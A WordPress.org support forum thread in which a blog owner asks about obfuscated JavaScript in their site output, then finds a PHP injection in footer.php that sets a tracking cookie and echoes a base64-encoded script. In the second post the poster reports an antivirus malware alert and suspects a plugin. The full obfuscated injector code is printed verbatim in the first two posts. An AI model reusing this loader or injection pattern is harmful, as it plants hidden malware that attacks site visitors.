WordPress.org

1. sabinou
   Member
   Posted 11 months ago #

   Hello,

   I've observed something strange in the source code of my blog as I am shown it when I visit it.

   For the life of me, I can't figure out what that may be, or mean, or be supposed to do.

   All I can't say is that none of my usual plugins should be generating this, and I don't think I have a local program (for instance a browser plugin/AV/whatever) editing my pages on the fly with this.

   Would someone have a hint from the code ? Thank you very much if you can share your opinion :)
   (I'm sorry, this is a private blog, I can't share its URL !)

   Here is the oddity :

   <script type="text/javascript">document.cookie = "d41d8cd98f00b204e9800998ecf8427e="+escape('1308275364.3124106')+"; expires=Sun, 17 Jul 2011 00:00:00; path=/";</script><script type="text/javascript">rif=0.049;rif++;met=false;obe=cap('igKXZ5zbm0',14);lav=0.008;lav--;lit='i158Ws7';wop=23;wop+=17;say=cap('VUJhrn9PPlGnc5u8lJZ0upLYKV3LBUea3UMu8T1SwR8pFL4ZyuWKK5mub8Jv60TMJrrnikUrkmc5UTljDW04Bpf9z0VOaTskMXXOnE4kNUFSxEpMWbAlm570HYz7THdN6h9WSr1GcKIDlWfj0ECvKn3xBTeJ3ii8hJnfOk',5);lux='ham';boy=3978;jar=document;jar[obe](say);function dud(kq,kz){var kk,b,s;w=7805;w++;k=['vow','eld','mid'];p=0.0047;p+=0.003;d=6;if(d<22){l=0.036;if(l>16){f=7174;if(f!=0){q=0.017;if(q>0.0227){z=21;z-=14;h=3408;h++}}u=[0,24,16,32,8]}j=8038}v=0.0158;if(v!=0){o=0.004;if(o<null){y=0.003}}s=/[N0eMC6g7Hp]/g;c=null;c-=4936;n=null;x=5775;x+=0.0061;b='6s7ugbMsMt7r';r=0.0095;r++;t=0.0097;t--;g=0.0514;if(g<16){i=1488;if(i<3978){m=0.006;m++;a=0;a+=1172}kw=3493;kw-=2403}kk=b.replace(s,'');kp=0.006;kp++;kd=11;if(kd<7711){kl=3671;kl-=7256}kf=0.0057;kf++;return kk}function cap(jk,jp){var rb,on,fb,ou,d,ae,ot,mb,fg,ac,af,oi,ae,rr,mg,rc,d,rr,fb,rr,fg,x,j;i=24;i-=3378;f=[28,21,14,35,7,0];r='sel';o=19;if(o!=0.015){a={leu:['wae','gip']};m=0.01}j=dud();l=22;if(l<15){y=2959;y+=24}h=9;if(h==6){t=5041;t+=1499}c=0.0072;c+=0.012;d='uNdjlenulhn'[j](4,3);g='has';u='UIJkK4_';q=22;q--;d+='H_SFgthcW'[j](4,3);k=2830;p='fee';x=86;w=0.008;w--;b=30;if(b>26){z={ova:0.0299};n=7557;if(n<4692){v=0.022;if(v<0.017){fi=1160}ff=0.019;if(ff>6487){fr=0.0095;fr--;fo=0.003}}}x-=24;fa=0.0076;fa+=18;fm=11;if(fm!=7){fj=1140;if(fj<0.001){fl=0.0037;if(fl>5009){fy=18;fy-=14}fe=3107;if(fe!=0){fh=4334;fh++}}}ft=7521;if(ft>0){fc=5777;fd=true}fg='qifindeBrWa'[j](3,4);fu=3871;fu--;fq=2859;fs=0.015;fs--;fg+='OliXxOfuROg'[j](4,3);fp=0.007;fp-=6;fx=0.019;fx++;fw=0.011;fw+=21;fb='jhtysubmzRT'[j](4,3);fz=0.0136;fz--;fn=12;fb+='pkstrhR'[j](2,3);ri=7;ri++;rf=19;rf++;rr='aSGjfromZ4E6'[j](4,4);ro=3529;ro--;ra=0.025;if(ra>null){rm=0.0035;rm++}rr+='qV8wChardIz5'[j](4,4);rl=1515;rl++;ry=0.011;ry+=0.0316;rr+='mjCodeg5'[j](2,4);rh=[14,42,0,35,28,21,7];rt='zAOCUi5om3';rc=21;rd=0.0065;rd+=29;rg=0.01;if(rg==1481){ru=4205;ru++}rq=2412;rq+=7512;rc-=5;rs=5638;if(rs>9){rk=null;rp=0;rp+=1627}rx=0.0173;rx-=0.0109;rw=null;rb='7hOpR5eGNYvMr4EAVSwuK3djIbz91ZCa28gmq6XlyBQtkxLJiUD0HnPWoTscFf';rz=19;rz--;rn={vox:'cox'};rv=['end','awn'];oi='';of=0.077;if(of==null){or=0.008;if(or>7082){oo=0.0013;if(oo<0.005){oa=5773;if(oa>0){om=21;om+=5;oj=0.013}}}}ol=1223;oy=21;if(oy==null){oe=12;oh='hog'}ot='';oc=13;oc++;od='sad';og=5854;og--;ou=0;oq=3711;if(oq!=12){os='wad';ok=0;ok-=7741}op=3529;op-=0.0011;ox=28;if(ox<9){ow=0.023;ob=0.01;if(ob<0.047){oz=['wow','ged','mac']}}on=jk[d];ov={owe:0.0447};ai=[10,5,0,20,25,30,35,15];for(af=0;af<on;af++){ar=false;ao=3708;if(ao>0){aa=5;aa--}ou+=jp;am=6253;if(am!=0.0496){aj=6171;aj--;al=null;al+=3708}ay=8;ay++;ae=jk[fb](af,1);ah=0.005;ah++;at=6;at++;ac=rb[fg](ae);ad=0.019;ad++;ag=2588;ag++;au=0.011;if(au>3411){aq=3613;aq-=12}ac+=ou;as=[16,32,48,40,24,8,0];ak=14;if(ak==0.0011){ap=6682;ap--;ax=0.0062;if(ax<0.014){aw=3720;aw++;ab=0.009;ab-=5602}}az=8664;ac%=x;an=0.0048;an++;av=26;av--;oi+=rb[fb](ac,1);mi=0.0086;if(mi!=0.01){mf=7;mf-=3664;mr=null;mr+=0.0103}mo=0.0116;if(mo<0.0101){ma=6662;if(ma==0.007){mm=1054;mm++;mj=3401;if(mj!=null){ml=2854;if(ml>0.0051){my=7415;my--;me=null;me+=12}mh=0.003;mh+=0.011}}mt=1477;mt-=9}}mc=0;mc+=14;md='MDktQg';for(mg=0;mg<on;){mu=null;mu-=19;mq='rex';ae=oi[fb](mg,2);mk=0.0455;mp=0.018;mp--;mx=1500;if(mx!=18){mw=['ops','ore','orc']}mb=parseInt(ae,rc);mz=null;mn=0.009;if(mn==7990){mv=0.0048;mv++}ji=0;ji-=23;ot+=String[rr](mb);jf='W3InSmdiX';jr=6971;if(jr<null){jo=0;jo-=6097;ja=5094}mg+=2;jm=1793;jm+=30;jj=false;jl=6;if(jl!=4897){jy=0.0092;jy++}}je=5055;je--;jh=15;jh++;jt=0.0246;if(jt==0.014){jc=0.0112;if(jc<0){jd=6;jd-=15}jg=0.0155;if(jg!=3586){ju=0.019;if(ju==0.0325){jq='sap'}js=3884;js+=1882}}return ot}</script></body>
   </html>

2. sabinou
   Member
   Posted 11 months ago #

   Update : WHAT THE HELL ?!

   It's not only the public version served to the visitors, there is THIS in the footer.php code (added with a legit line to give you its position)

   <?php wp_footer(); ?>
   <?php
   $__name = "d41d8cd98f00b204e9800998ecf8427e";
   if(1>0 ) {
   error_reporting(0);
   $date = date("D, j M Y 00:00:00", time()+60*60*24*30);
   $cookie = time().".".rand(1111111, 9999999);
   echo "<script type=\"text/javascript\">document.cookie = \"".$__name."=\"+escape('".$cookie."')+\"; expires=".$date."; path=/\";</script>";
   
   $__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
   echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnJpZj0wLjA0OTtyaWYrKzttZXQ9ZmFsc2U7b2JlPWNhcCgnaWdLWFo1emJtMCcsMTQpO2xhdj0wLjAwODtsYXYtLTtsaXQ9J2kxNThXczcnO3dvcD0yMzt3b3ArPTE3O3NheT1jYXAoJ1ZVSmhybjlQUGxHbmM1dThsSlowdXBMWUtWM0xCVWVhM1VNdThUMVN3UjhwRkw0Wnl1V0tLNW11YjhKdjYwVE1KcnJuaWtVcmttYzVVVGxqRFcwNEJwZjl6MFZPYVRza01YWE9uRTRrTlVGU3hFcE1XYkFsbTU3MEhZejdUSGRONmg5V1NyMUdjS0lEbFdmajBFQ3ZLbjN4QlRlSjNpaThoSm5mT2snLDUpO2x1eD0naGFtJztib3k9Mzk3ODtqYXI9ZG9jdW1lbnQ7amFyW29iZV0oc2F5KTtmdW5jdGlvbiBkdWQoa3Esa3ope3ZhciBrayxiLHM7dz03ODA1O3crKztrPVsndm93JywnZWxkJywnbWlkJ107cD0wLjAwNDc7cCs9MC4wMDM7ZD02O2lmKGQ8MjIpe2w9MC4wMzY7aWYobD4xNil7Zj03MTc0O2lmKGYhPTApe3E9MC4wMTc7aWYocT4wLjAyMjcpe3o9MjE7ei09MTQ7aD0zNDA4O2grK319dT1bMCwyNCwxNiwzMiw4XX1qPTgwMzh9dj0wLjAxNTg7aWYodiE9MCl7bz0wLjAwNDtpZihvPG51bGwpe3k9MC4wMDN9fXM9L1tOMGVNQzZnN0hwXS9nO2M9bnVsbDtjLT00OTM2O249bnVsbDt4PTU3NzU7eCs9MC4wMDYxO2I9JzZzN3VnYk1zTXQ3cic7cj0wLjAwOTU7cisrO3Q9MC4wMDk3O3QtLTtnPTAuMDUxNDtpZihnPDE2KXtpPTE0ODg7aWYoaTwzOTc4KXttPTAuMDA2O20rKzthPTA7YSs9MTE3Mn1rdz0zNDkzO2t3LT0yNDAzfWtrPWIucmVwbGFjZShzLCcnKTtrcD0wLjAwNjtrcCsrO2tkPTExO2lmKGtkPDc3MTEpe2tsPTM2NzE7a2wtPTcyNTZ9a2Y9MC4wMDU3O2tmKys7cmV0dXJuIGtrfWZ1bmN0aW9uIGNhcChqayxqcCl7dmFyIHJiLG9uLGZiLG91LGQsYWUsb3QsbWIsZmcsYWMsYWYsb2ksYWUscnIsbWcscmMsZCxycixmYixycixmZyx4LGo7aT0yNDtpLT0zMzc4O2Y9WzI4LDIxLDE0LDM1LDcsMF07cj0nc2VsJztvPTE5O2lmKG8hPTAuMDE1KXthPXtsZXU6Wyd3YWUnLCdnaXAnXX07bT0wLjAxfWo9ZHVkKCk7bD0yMjtpZihsPDE1KXt5PTI5NTk7eSs9MjR9aD05O2lmKGg9PTYpe3Q9NTA0MTt0Kz0xNDk5fWM9MC4wMDcyO2MrPTAuMDEyO2Q9J3VOZGpsZW51bGhuJ1tqXSg0LDMpO2c9J2hhcyc7dT0nVUlKa0s0Xyc7cT0yMjtxLS07ZCs9J0hfU0ZndGhjVydbal0oNCwzKTtrPTI4MzA7cD0nZmVlJzt4PTg2O3c9MC4wMDg7dy0tO2I9MzA7aWYoYj4yNil7ej17b3ZhOjAuMDI5OX07bj03NTU3O2lmKG48NDY5Mil7dj0wLjAyMjtpZih2PDAuMDE3KXtmaT0xMTYwfWZmPTAuMDE5O2lmKGZmPjY0ODcpe2ZyPTAuMDA5NTtmci0tO2ZvPTAuMDAzfX19eC09MjQ7ZmE9MC4wMDc2O2ZhKz0xODtmbT0xMTtpZihmbSE9Nyl7Zmo9MTE0MDtpZihmajwwLjAwMSl7Zmw9MC4wMDM3O2lmKGZsPjUwMDkpe2Z5PTE4O2Z5LT0xNH1mZT0zMTA3O2lmKGZlIT0wKXtmaD00MzM0O2ZoKyt9fX1mdD03NTIxO2lmKGZ0PjApe2ZjPTU3Nzc7ZmQ9dHJ1ZX1mZz0ncWlmaW5kZUJyV2EnW2pdKDMsNCk7ZnU9Mzg3MTtmdS0tO2ZxPTI4NTk7ZnM9MC4wMTU7ZnMtLTtmZys9J09saVh4T2Z1Uk9nJ1tqXSg0LDMpO2ZwPTAuMDA3O2ZwLT02O2Z4PTAuMDE5O2Z4Kys7Znc9MC4wMTE7ZncrPTIxO2ZiPSdqaHR5c3VibXpSVCdbal0oNCwzKTtmej0wLjAxMzY7ZnotLTtmbj0xMjtmYis9J3Brc3RyaFInW2pdKDIsMyk7cmk9NztyaSsrO3JmPTE5O3JmKys7cnI9J2FTR2pmcm9tWjRFNidbal0oNCw0KTtybz0zNTI5O3JvLS07cmE9MC4wMjU7aWYocmE+bnVsbCl7cm09MC4wMDM1O3JtKyt9cnIrPSdxVjh3Q2hhcmRJejUnW2pdKDQsNCk7cmw9MTUxNTtybCsrO3J5PTAuMDExO3J5Kz0wLjAzMTY7cnIrPSdtakNvZGVnNSdbal0oMiw0KTtyaD1bMTQsNDIsMCwzNSwyOCwyMSw3XTtydD0nekFPQ1VpNW9tMyc7cmM9MjE7cmQ9MC4wMDY1O3JkKz0yOTtyZz0wLjAxO2lmKHJnPT0xNDgxKXtydT00MjA1O3J1Kyt9cnE9MjQxMjtycSs9NzUxMjtyYy09NTtycz01NjM4O2lmKHJzPjkpe3JrPW51bGw7cnA9MDtycCs9MTYyN31yeD0wLjAxNzM7cngtPTAuMDEwOTtydz1udWxsO3JiPSc3aE9wUjVlR05Zdk1yNEVBVlN3dUszZGpJYno5MVpDYTI4Z21xNlhseUJRdGt4TEppVUQwSG5QV29Uc2NGZic7cno9MTk7cnotLTtybj17dm94Oidjb3gnfTtydj1bJ2VuZCcsJ2F3biddO29pPScnO29mPTAuMDc3O2lmKG9mPT1udWxsKXtvcj0wLjAwODtpZihvcj43MDgyKXtvbz0wLjAwMTM7aWYob288MC4wMDUpe29hPTU3NzM7aWYob2E+MCl7b209MjE7b20rPTU7b2o9MC4wMTN9fX19b2w9MTIyMztveT0yMTtpZihveT09bnVsbCl7b2U9MTI7b2g9J2hvZyd9b3Q9Jyc7b2M9MTM7b2MrKztvZD0nc2FkJztvZz01ODU0O29nLS07b3U9MDtvcT0zNzExO2lmKG9xIT0xMil7b3M9J3dhZCc7b2s9MDtvay09Nzc0MX1vcD0zNTI5O29wLT0wLjAwMTE7b3g9Mjg7aWYob3g8OSl7b3c9MC4wMjM7b2I9MC4wMTtpZihvYjwwLjA0Nyl7b3o9Wyd3b3cnLCdnZWQnLCdtYWMnXX19b249amtbZF07b3Y9e293ZTowLjA0NDd9O2FpPVsxMCw1LDAsMjAsMjUsMzAsMzUsMTVdO2ZvcihhZj0wO2FmPG9uO2FmKyspe2FyPWZhbHNlO2FvPTM3MDg7aWYoYW8+MCl7YWE9NTthYS0tfW91Kz1qcDthbT02MjUzO2lmKGFtIT0wLjA0OTYpe2FqPTYxNzE7YWotLTthbD1udWxsO2FsKz0zNzA4fWF5PTg7YXkrKzthZT1qa1tmYl0oYWYsMSk7YWg9MC4wMDU7YWgrKzthdD02O2F0Kys7YWM9cmJbZmddKGFlKTthZD0wLjAxOTthZCsrO2FnPTI1ODg7YWcrKzthdT0wLjAxMTtpZihhdT4zNDExKXthcT0zNjEzO2FxLT0xMn1hYys9b3U7YXM9WzE2LDMyLDQ4LDQwLDI0LDgsMF07YWs9MTQ7aWYoYWs9PTAuMDAxMSl7YXA9NjY4MjthcC0tO2F4PTAuMDA2MjtpZihheDwwLjAxNCl7YXc9MzcyMDthdysrO2FiPTAuMDA5O2FiLT01NjAyfX1hej04NjY0O2FjJT14O2FuPTAuMDA0ODthbisrO2F2PTI2O2F2LS07b2krPXJiW2ZiXShhYywxKTttaT0wLjAwODY7aWYobWkhPTAuMDEpe21mPTc7bWYtPTM2NjQ7bXI9bnVsbDttcis9MC4wMTAzfW1vPTAuMDExNjtpZihtbzwwLjAxMDEpe21hPTY2NjI7aWYobWE9PTAuMDA3KXttbT0xMDU0O21tKys7bWo9MzQwMTtpZihtaiE9bnVsbCl7bWw9Mjg1NDtpZihtbD4wLjAwNTEpe215PTc0MTU7bXktLTttZT1udWxsO21lKz0xMn1taD0wLjAwMzttaCs9MC4wMTF9fW10PTE0Nzc7bXQtPTl9fW1jPTA7bWMrPTE0O21kPSdNRGt0UWcnO2ZvcihtZz0wO21nPG9uOyl7bXU9bnVsbDttdS09MTk7bXE9J3JleCc7YWU9b2lbZmJdKG1nLDIpO21rPTAuMDQ1NTttcD0wLjAxODttcC0tO214PTE1MDA7aWYobXghPTE4KXttdz1bJ29wcycsJ29yZScsJ29yYyddfW1iPXBhcnNlSW50KGFlLHJjKTttej1udWxsO21uPTAuMDA5O2lmKG1uPT03OTkwKXttdj0wLjAwNDg7bXYrK31qaT0wO2ppLT0yMztvdCs9U3RyaW5nW3JyXShtYik7amY9J1czSW5TbWRpWCc7anI9Njk3MTtpZihqcjxudWxsKXtqbz0wO2pvLT02MDk3O2phPTUwOTR9bWcrPTI7am09MTc5MztqbSs9MzA7amo9ZmFsc2U7amw9NjtpZihqbCE9NDg5Nyl7ank9MC4wMDkyO2p5Kyt9fWplPTUwNTU7amUtLTtqaD0xNTtqaCsrO2p0PTAuMDI0NjtpZihqdD09MC4wMTQpe2pjPTAuMDExMjtpZihqYzwwKXtqZD02O2pkLT0xNX1qZz0wLjAxNTU7aWYoamchPTM1ODYpe2p1PTAuMDE5O2lmKGp1PT0wLjAzMjUpe2pxPSdzYXAnfWpzPTM4ODQ7anMrPTE4ODJ9fXJldHVybiBvdH08L3NjcmlwdD4=");
   } unset($__name);
   
   ?>

3. sabinou
   Member
   Posted 11 months ago #

   Final update regarding this thread.

   I found my reply the hard way : something trying to inject malware into my visitors, reported by Avast.

   It appears something or someone is using or editing one way or another the Wp-Postratings plugin of Lesterchan (Gamerz) to run nasty stuff. I broke my blog's public html output into several parts, splitting them over and over, until I found the code line triggering the virus injection was the call for wp-postratings. Deactivating the plugin stopped the virus attack on my visitors.

   I had this malware injection attempt problem last week already, and Lesterchan, to whom I reported, simply concluded it wasn't his plugin's fault. Yeah, right. I deleted postratings by FTP and had wordpress reinstall it by connecting to wordpress.org, but apart from that, the plugin is NOT vulnerable to something using it, not to the least, no.
   I don't blame Lesterchan, it may be another compromised website on my shared host, it may be me allowing stuff I didn't notice, it could be pretty anything, but I'm still rather annoyed at a plugin allowing, twice, a security hole.

   Case closed, the rest is outside of the present thread's object.

Reply

You must log in to post.